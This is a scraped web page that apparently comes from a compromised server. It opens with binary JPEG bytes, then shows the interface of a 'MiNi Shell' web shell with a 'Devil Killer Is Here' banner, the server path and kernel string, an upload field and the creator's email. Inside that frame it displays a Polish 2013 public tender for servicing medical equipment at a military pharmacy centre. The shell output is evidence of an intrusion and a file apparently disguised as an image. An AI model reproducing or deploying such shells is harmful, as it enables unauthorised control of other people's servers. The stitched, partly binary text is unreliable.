JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130212/22593-N-2013.html

<p class="kh_header"><b>Celestynów: Usługa w zakresie przeglądu technicznego i konserwacji sprzętu i aparatury medycznej -sprawa 14/2013</b><br>
<b>Numer ogłoszenia: 22593 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowy Ośrodek Farmacji  i Techniki Medycznej , ul. Wojska Polskiego 57, 05-430 Celestynów, woj. mazowieckie, tel. 022 7897906 w. 317, faks 022 7898291, 7897906 w. 191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://wofitm-przetargi.dyndns.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa w zakresie przeglądu technicznego i konserwacji sprzętu i aparatury medycznej -sprawa 14/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Autoklaw Sterilclawe 24 B - szt. 8, rok produkcji - 2008  	szt.	1	50421000-2	wrzesień 2013
2.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Autoklaw Sterilclawe 24 B PRINT - szt. 2, rok produkcji - 2005 	szt.	1	50421000-2	wrzesień 2013
3.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Unit stomatologiczny Polowy Dentronic Typ MINI-DENT z wyposażeniem - szt. 2, rok produkcji - 2005 	szt.	1	50421000-2	wrzesień 2013
4.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Aparat RTG diagnostyczny przenośny typ CYBERMOBIL PMX 300 - szt. 4, rok produkcji - 2008 	szt.	1	50421000-2	lipiec 2013
5.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Aparat do elektrochirurgii z wyposażeniem typ GN 300 - szt. 1, rok produkcji - 2008 	szt.	1	50421000-2	marzec 2013
6.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Aparat EKG typ Cardiovit AT-1 - szt. 10, rok produkcji - 2002 - 5 szt., 2006 - 5 szt. 	szt.	1	50421000-2	marzec 2013
7.	Usługa w zakresie przeglądu technicznego i naprawy sprzętu i aparatury medycznej: Defibrylator M-Series ACLS/P/S/N/12/B/DC- szt. 8, rok produkcji - 2008 (wymiana akumulatorów 16szt.)	szt.	1	50421000-2	wrzesień 2013
8.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Aparat do sztucznego oddechu z pompą do odsysania wydzielin - szt. 35, rok produkcji - 2008 	szt.	1	50421000-2	marzec 2013
9.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Pompa infuzyjna strzykawkowa Perfusor Space - szt. 15, rok produkcji - 2008 	szt.	1	50421000-2	marzec 2013
10.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Kardiomonitor model - BSM 2301K producent NIHON KOHDEN CORPORATION  - szt. 2, rok produkcji - 2002	szt.	1	50421000-2	wrzesień 2013
11.	Usługa w zakresie przeglądu technicznego i naprawy sprzętu i aparatury medycznej: Ultrasonograf LOGIO BOOK  - szt. 1, rok produkcji - 2002 (wymiana akumulatora)	szt.	1	50421000-2	wrzesień 2013
12.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Respirator MEDUMAT-Standard- kpl. 8, rok produkcji - 2008	szt.	1	50421000-2	marzec 2013
13.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Defibrylator ZOOL M-Series- szt. 2, rok produkcji - 2002 	szt.	1	50421000-2	wrzesień 2013
14.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Defibrylator LIFEPAK 12 producent CELTICA USA- szt.1, rok produkcji - 1998 (wymiana akumulatora z kontrolą stanu i kabla EKG-3-odprowadzeniowego)	szt.	1	50421000-2	wrzesień 2013
15.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: Defibrylator LIFEPAK 9 producent PHYSIO-CONTROL- szt.1, rok produkcji - 2003 (wymiana akumulatora, wałka drukarki 50mm, kabla EKG 3-odprowadzeniowego LP9, akumulatora i rolki drukarki)	szt.	1	50421000-2	wrzesień 2013
16.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: ZESTAW DIAGNOSTYCZNO-LABORATORYJNY LAB-3-1szt.	szt.	1	50421000-2	marzec 2013
17.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: RESUSCYTATOR SAP-1- 10szt.	szt.	1	50421000-2	marzec 2013
18.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: DEFIBRYLATOR ZOLL SERIES- 2szt.	szt.	1	50421000-2	wrzesień 2013
19.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: DEFIBRYLATOR MFE- 3szt.	szt.	1	50421000-2	marzec 2013
20.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: APARAT RTG SAXO - 1szt.	szt.	1	50421000-2	marzec 2013
21.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: DIATERMIA CHIRURGICZNA FORCE F2-8 PCH-3szt.	szt.	1	50421000-2	marzec 2013
22.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: ELEKTROKARDIOGRAF TYP AT-1-11szt.	szt.	1	50421000-2	marzec 2013
23.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: POMPA STRZYKAWKOWA PERFUSOR - 2szt.	szt.	1	50421000-2	marzec 2013
24.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: SSAK OB.  - 5szt.	szt.	1	50421000-2	wrzesień 2013
25.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: KARDIOMONITOR ARGUS LCM - 1szt.	szt.	1	50421000-2	marzec 2013
26.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: AUTOKLAW KASETOWY STATIM 7000- 1szt.	szt.	1	50421000-2	marzec 2013
27.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: RESPIRATOR PARAPAC 200D-1szt.	szt.	1	50421000-2	wrzesień 2013
28.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: DIATERMIA CHIRURGICZNA GT-400P-6szt.	szt.	1	50421000-2	marzec 2013
29.	Usługa w zakresie przeglądu technicznego i naprawy sprzętu i aparatury medycznej:  Pompa infuzyjna strzykawkowa Perfusor Space - szt. 1, rok produkcji - 2008 (Wymiana akumulatora)	szt.	1	50421000-2	marzec 2013
30.	Usługa w zakresie przeglądu technicznego sprzętu i aparatury medycznej: POMPA INFUZYJNA STRZYKAWKOWA PERFUSOR - 2szt.	szt.	1	50421000-2	marzec 2013
31	Usługa w zakresie przeprowadzenia przeglądu technicznego i konserwacji komory chłodniczej - szt. 1 Przegląd techniczny, konserwacja i ewentualna naprawa dwuczęściowej komory chłodniczej o łącznych wymiarach:
- długość 570 cm
- szerokość 430 cm
- wysokość 270cm
Komora wyposażona jest w:
- agregat chłodniczy Danfos Optima OPMCHO 100 - szt. 2,
- chłodnica Luve SHS 32 - szt. 2,
- rejestrator temperatury z drukarką ESCO model 100 - szt. 1
	szt.	1	50800000-3	grudzień 2013.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3, 50.42.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w w/w postępowaniu, w szczególności dotyczące:
a)	posiadania wiedzy i doświadczenia:
Wykonawcy powinni udokumentować, że wykonali bądź wykonują co najmniej 
1 usługę w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy 
- w tym okresie, polegającą na usłudze będącej  przedmiotem zamówienia.
Należy podać datę i miejsce wykonania (wzór stanowi zał. nr 5 do SIWZ) oraz załączyć dokument potwierdzający, że usługa została wykonana lub jest wykonywana należycie.

2.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. 
3.	Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 pzp.
4.	Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia.
5.	Oferta wykonawcy wykluczonego uznana zostanie za odrzuconą.
6.	Zamawiający odrzuci ofertę, jeżeli:
a)	jest niezgodna z ustawą;
b)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
z zastrzeżeniem art. 87 ust. 2 pkt. 3 pzp;
c)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
o zwalczaniu nieuczciwej konkurencji;
d)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
e)	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu 
o udzielenie zamówienia;
f)	zawiera błędy w obliczeniu ceny;
g)	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 pzp;
h)	jest nieważna na podstawie odrębnych przepisów.
7.	O wykluczeniu z postępowania oraz o odrzuceniu oferty wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wofitm-przetargi.dyndns.org/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://wofitm-przetargi.dyndns.org/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 08:30, miejsce: w siedzibie Zamawiającego: kancelaria jawna lub biuro przepustek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com